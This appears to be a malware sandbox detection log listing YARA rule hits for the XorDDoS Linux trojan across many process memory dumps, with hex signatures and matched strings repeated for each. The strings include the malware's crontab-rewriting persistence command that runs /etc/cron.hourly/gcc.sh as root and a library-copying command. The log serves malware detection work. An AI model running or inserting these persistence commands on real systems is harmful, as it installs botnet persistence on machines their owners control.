6329.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6329.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6329.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6329.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6329.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6329.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6329.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6382.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6382.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6382.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6382.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6382.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6382.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6382.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6491.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6491.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6491.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6491.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6491.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6491.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6491.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6363.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6363.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6363.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6363.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6363.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6363.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6363.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6349.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6349.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6349.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6349.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6349.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6349.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6349.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6524.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6524.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6524.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6524.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6524.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6524.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6524.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6430.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6430.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6430.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6430.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6430.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6430.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6430.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6388.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6388.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6388.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6388.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6388.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6388.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6388.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6371.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6371.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6371.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6371.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6371.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6371.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6371.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6510.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6510.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6510.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6510.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6510.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6510.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6510.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6447.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6447.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6447.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6447.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6447.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6447.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6447.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6279.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6279.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6279.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6279.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6279.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6279.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6279.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6351.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6351.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6351.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6351.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6351.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6351.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6351.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6545.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6545.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6545.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6545.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6545.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6545.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6545.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
